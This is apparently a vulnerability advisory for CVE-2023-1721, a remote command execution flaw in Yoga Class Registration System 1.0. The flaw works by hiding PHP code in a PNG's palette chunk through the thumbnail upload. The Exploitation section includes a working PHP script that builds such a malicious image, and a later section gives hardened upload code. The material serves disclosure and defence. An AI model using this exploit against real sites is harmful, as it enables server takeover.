Yoga Class Registration System 1.0 - RCE

9.1

Critical

Discovered by 

Carlos Bello

Offensive Team, Fluid Attacks

Summary

Full name: Yoga Class Registration System 1.0 - RCE

Code name:

State: Public

Release date: 23 Jun 2023

Affected product: Yoga Class Registration System

Affected version(s): Version 1.0

Vulnerability name: Remote command execution

Remotely exploitable: Yes

CVSS v3.1 vector string: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVSS v3.1 base score: 9.1

Exploit available: Yes

CVE ID(s): CVE-2023-1721

Description

Yoga Class Registration System version 1.0 allows an administrator to execute commands on the server. This is possible because the application does not correctly validate the thumbnails of the classes uploaded by the administrators.

Vulnerability

The application allows administrators to upload classes to the platform. Among the fields available when creating a class, there is a very interesting one called "thumbnail": in this field we can upload an image that will be shown as the cover of the class.

The vulnerability lies in the way the server processes the image uploaded with the class. The following is a fragment of the code in charge of processing the image:


In the above fragment we see that the image name is used to construct the final path where the image will be stored.


This means that we can define the extension the file will have, as well as the path where it will be stored on the server. This looks promising; however, there are certain restrictions on the content of the file, because the server performs the following operations on the image uploaded by the user:


The imagecreatefromjpeg and imagecreatefrompng functions create new images (compressed at level 9 with the zlib library) from the image uploaded by the user. This process strips the image comments and most of the PNG chunks, except for one called PLTE (the palette of an indexed-colour image).

On the other hand, the imagescale function resizes the image if necessary, and the resized image no longer carries the PLTE chunk. However, if we send an image that does not need to be resized, the PLTE chunk is retained. For that, it is enough to upload an image whose width is at most 640 pixels and whose height is at most 480 pixels.

Exploitation

To exploit the above vulnerability we need to be administrators; for that, we just need to exploit CVE-2023-1722. Once we manage to be admin, we must build a malicious image that survives the transformations and resizing performed by the server. To achieve this I have written the following exploit:

Exploit.php

<?php
// Usage: php exploit.php '<PHP payload>' <output file>
if(count($argv) != 3) exit("Usage: $argv[0] <PHP payload> <Output file>\n");

$_payload = $argv[1];
$output = $argv[2];

// Pad the payload with spaces so its length is a multiple of 3:
// every 3 bytes become one RGB palette entry.
while (strlen($_payload) % 3 != 0) { $_payload .= " "; }

$_pay_len = strlen($_payload);
// A PNG palette holds at most 256 entries, i.e. 768 payload bytes.
if ($_pay_len > 256*3){
    echo "FATAL: The payload is too long. Exiting...\n";
    exit();
}
if($_pay_len % 3 != 0){
    echo "FATAL: The payload isn't divisible by 3. Exiting...\n";
    exit();
}

// One pixel column per palette entry; the result stays well within 640x480,
// so the server does not resize it and the PLTE chunk survives.
$width = $_pay_len/3;
$height = 20;
$im = imagecreate($width, $height);   // palette-based (indexed) image

// Hex-encode the payload and split it into 6-hex-digit (3-byte) RGB triples.
$_hex = unpack('H*', $_payload);
$_chunks = str_split($_hex[1], 6);

for($i = 0; $i < count($_chunks); $i++){
    $_color_chunks = str_split($_chunks[$i], 2);
    // Each payload triple is allocated as one palette colour, in order.
    $color = imagecolorallocate($im, hexdec($_color_chunks[0]), hexdec($_color_chunks[1]), hexdec($_color_chunks[2]));
    imagesetpixel($im, $i, 1, $color);
}

imagepng($im, $output);

Now we just have to run the exploit, passing the payload and the output file:

php exploit.php '<?php phpinfo(); ?>' <output file>

Our security policy

We have reserved the ID CVE-2023-1721 to refer to this issue from now on.

Disclosure policy

System Information

  • Version: Yoga Class Registration System 1.0

  • Operating System: GNU/Linux

Mitigation

There is currently no patch available for this vulnerability.
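Since no vendor patch exists, the following is an added example (written for this advisory, not the project's code) of how the thumbnail handling described in the Vulnerability section could be hardened. It addresses both root causes at once: the client-supplied file name never decides the stored path or extension, and the decoded image is always redrawn onto a fresh truecolor canvas, so the PLTE chunk does not survive even when the image already fits within 640x480 and would have skipped imagescale. The function name store_thumbnail, the THUMB_DIR location and the use of getimagesize for type detection are assumptions; the 640x480 limit is the one stated in the advisory.

```php
<?php
// Added example (not the vendor's code): hardened handling of the class
// thumbnail. It addresses the two root causes described in the advisory:
//  1. the client-supplied file name must not decide the stored path or extension;
//  2. a palette (PLTE) image must never be written back as-is, even when it
//     already fits within 640x480 and the original code would skip imagescale().

const THUMB_MAX_W = 640;   // limits taken from the advisory
const THUMB_MAX_H = 480;
// Assumption: a directory outside the document root, or one where the web
// server is configured not to execute PHP.
const THUMB_DIR = __DIR__ . '/storage/thumbnails';

/**
 * Store one uploaded thumbnail and return the server-generated file name.
 * $upload is one entry of $_FILES, e.g. $_FILES['thumbnail'].
 *
 * @throws RuntimeException on any validation or processing failure
 */
function store_thumbnail(array $upload): string
{
    if (($upload['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed');
    }
    $tmp = $upload['tmp_name'];
    if (!is_uploaded_file($tmp)) {
        throw new RuntimeException('Not an uploaded file');
    }

    // Decide the type from the file bytes, never from the name or the
    // client-supplied MIME type.
    $info = getimagesize($tmp);
    if ($info === false) {
        throw new RuntimeException('Not a recognised image');
    }
    switch ($info[2]) {
        case IMAGETYPE_JPEG: $src = imagecreatefromjpeg($tmp); break;
        case IMAGETYPE_PNG:  $src = imagecreatefrompng($tmp);  break;
        default: throw new RuntimeException('Only JPEG and PNG thumbnails are accepted');
    }
    if ($src === false) {
        throw new RuntimeException('Image could not be decoded');
    }

    // Always re-render onto a fresh truecolor canvas, scaling down only when
    // needed. GD writes no PLTE chunk for a truecolor PNG, so palette bytes
    // from the upload cannot be carried over, resized or not. Comments and
    // other ancillary chunks are dropped as well.
    $w = imagesx($src);
    $h = imagesy($src);
    $scale = min(1.0, THUMB_MAX_W / $w, THUMB_MAX_H / $h);
    $dw = max(1, (int) floor($w * $scale));
    $dh = max(1, (int) floor($h * $scale));

    $dst = imagecreatetruecolor($dw, $dh);
    imagealphablending($dst, false);   // keep PNG transparency instead of blending it away
    imagesavealpha($dst, true);
    imagecopyresampled($dst, $src, 0, 0, 0, 0, $dw, $dh, $w, $h);
    imagedestroy($src);

    // Server-chosen random name and a fixed extension: nothing from the
    // request reaches the file system path.
    if (!is_dir(THUMB_DIR) && !mkdir(THUMB_DIR, 0750, true)) {
        throw new RuntimeException('Thumbnail directory unavailable');
    }
    $name = bin2hex(random_bytes(16)) . '.png';
    $path = THUMB_DIR . '/' . $name;
    if (!imagepng($dst, $path, 9)) {
        imagedestroy($dst);
        throw new RuntimeException('Could not write thumbnail');
    }
    imagedestroy($dst);
    return $name;
}
```

Only the returned name needs to be stored with the class record; the file is then served by a script that reads it from THUMB_DIR and sends Content-Type: image/png. Re-rendering removes the carrier for the payload, and keeping the upload directory out of the document root (or with PHP execution disabled) is the second, independent line of defence in case another encoder bug lets bytes through.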

References

Timeline

30 Mar 2023

Vendor contacted

30 Mar 2023

Vendor replied

30 Mar 2023

Public disclosure

23 Jun 2023
